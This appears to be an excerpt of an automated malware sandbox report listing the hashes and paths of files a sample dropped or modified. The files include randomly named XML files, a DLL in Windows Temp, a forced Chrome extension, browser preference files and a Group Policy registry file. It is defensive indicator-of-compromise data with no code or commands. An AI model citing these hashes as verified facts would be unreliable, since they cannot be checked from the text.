SHA1 916de1586a143ae886d5e10fa60b9e3654c8aa23
SHA256 9aa50c4a92d838f921b03b2a7a9efcf57c518ad84be14044036f85538bf4aab7
SHA512 a97d17176606e35a6059bbd737384541772acbcdfc26c2949039a99e3f3d8496c005b36ea27b5094a24004d082ed5433ab3f05ff31bd05f32de421d59764b525

memory/664-219-0x00000000074C0000-0x000000000750B000-memory.dmp

C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

MD5 a526b9e7c716b3489d8cc062fbce4005
SHA1 2df502a944ff721241be20a9e449d2acd07e0312
SHA256 e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066
SHA512 d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 20dca9da21d73561fb8c9665048ebfd5
SHA1 01e68cb86ac8627dea58068c7dc4984730fc5cba
SHA256 61b59e182cc6ee50c58a48684def40ab4821dffc986f1df714a413e47604bffa
SHA512 a5ee67b9ea5f2d29eff8a63302514f376d6054b3558eb798b60bceb56478604b14c7c0257fc44214209ced92d2b9fa642db4f0307449173c2f1941c39afcd2ab

memory/4616-260-0x0000000002EE0000-0x0000000002F43000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 648dada68b2859efecdd9f8bd1bf0258
SHA1 d28d2dcb53c982f897ea6bf872a503eec3709cad
SHA256 7e531a097cb2de609acfd2d47e3ef92a5e9e74f0129c4b3951e9909e3054d619
SHA512 6af5a1a6dc56ae6a872038989e2e356aa68b37bf5163e23d21bd80d07194a3cbc9d78d07e410d162e3aa06bd6eff48699570fd7de834ee20bb0b0ef82e35e0fa

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Program Files (x86)\prAQyJMeU\FiwGDIq.xml

MD5 4de1658b66fd7665a1ddf600ac50efb2
SHA1 9512a9f29b8d234969b0e805187aeaad70b0739c
SHA256 fb55439daa5193486e457a97eecfdcd8728377879c650e75eda2b6d33be2bcc5
SHA512 ec7f44f2b3aef66633857789f46c5065ef79ee7c5907c718f2be5a1a7bd4443bbe0e56102623c491f8b211533fe0f23043da3ca9ccca9a51b44f4559192f17f6

C:\Program Files (x86)\zNBDoCPwUgCU2\OghXjcG.xml

MD5 0f42b61bc65d966f1d67ac08b5ca0212
SHA1 bc44a5c41336d9fe3be656356dd37bdb4de14c5b
SHA256 86b5391fe9b39e476e8293ce26ec24a45518b8041397f42e0ba0ade640be10c1
SHA512 038f3f3c521e36e220c831c63b0ee028b2ac780072da481f1b7f20dea85fe5ca57b6a5c0a3f28bfef3f8599c27ba8e44e22a29935c08032d9cab1702387a45b9

C:\ProgramData\wpmocubwzvTKZWVB\HPnFzwq.xml

MD5 81460167063fb5fba27d626b3c2219fc
SHA1 d7f5d18b904a59b293ca576746dc5c2acebbab83
SHA256 4a17fb23529a9c8a34f620b068e48967905dec609433580a84d11e7384bda5ef
SHA512 268becbb3aef2e0cd188e08349c0a5103f8a15eb9c2c31f04d1fb59d6f529ea8a5f479a2b3acf19c14c451f4cb70d06a27f788f04649d2f2cf9446912a6400c7

C:\Program Files (x86)\YrgxaRmWgsNWPaiiAzR\eeAXify.xml

MD5 8fcc92b53d4ce2536a73ffa0be3390c0
SHA1 4fe6273a0830207c64f4d58656df3d43e649dc37
SHA256 48f38381def2d8df772027cc5aeec24aff35621304c189f528f73a90aa84f7c5
SHA512 196149cd61e1177b7a527e12b15a9b9c252eccdee0dcf750f8743a5535091ded3c60f77a7bff834db739cb42051982160f0f6a4ed4323fd31d71f9bb83af3b83

C:\Program Files (x86)\hkBthRLftwjEC\lGlUDQP.xml

MD5 aa1fc8a35d150a3180c115929bbedf87
SHA1 d0143f5f65683da5a5a38a7b05a928ce57916f52
SHA256 21565f7b6a22b7e18fb0eb23e6a9b48ddf27b61a9dad614b6095bd686a33d9fa
SHA512 63581b38a34ddfa072f1073734bad9dbb50ed24e887941a077f3f449a87cedb792b53f5f1894b9601f30a75fa138523c8fb6eecc927bed04fd859852fa17d6fd

C:\Windows\Temp\HKomOEKiubDeyUja\oFVSDuqo\FCOViLB.dll

MD5 216eb0d2159277ee754d47ff6f6ac846
SHA1 acd01636db032de730b96f3d97262989f530da36
SHA256 d488c456e9a11710894221582b8664e12fd716e621c12bc5247dba70459c7f95
SHA512 16d34eb7bb2c1a0ee2f949cd7615dc53e59b28b1380f4b0ebbc3a6ce31804a4defeb6c00715eac93d2b733411b15f1c970aa6777753ebe488f75840765ca551d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\wtg1s5j6.default-release\prefs.js

MD5 8811b13c1bf5c66ac1cdc8f1f525b8c5
SHA1 84cb9b7b8ad690d179ff8c6249c425e2a9ffe0e6
SHA256 a5133576f01fd563c0483315e6cd89ec135830c86af56137935cb0d5c0c387e9
SHA512 5e2668967e88a7aad38e7ca6bc678b6e60578df218aeb10840f3c711796802603d5eb26e3be14f1833fce5c44dcb24b11bc6bd82724029ea10922dae811ac3ac

memory/4616-443-0x0000000002F50000-0x0000000002FD1000-memory.dmp

memory/4616-453-0x0000000003A50000-0x0000000003B32000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 ed942420f54f17a6eddb378d4b0833ab
SHA1 9fcea807cd5e4f31b646ee66097d6e25a39319bb
SHA256 daeee527d4a77bdd2f7459648905453f1b96a58a9c7f6bd5a43005db595bcab9
SHA512 d776d9c1c0a450f949b56cc2a7b8ac3a8ad50c8ec47dc647ecfdeec52ccfece189307d6944bc6ff5824dfb1b258efd5e7c03d6f4f1ebd9d805d240dd8f9991da

memory/3000-473-0x00000000039F0000-0x0000000003FD8000-memory.dmp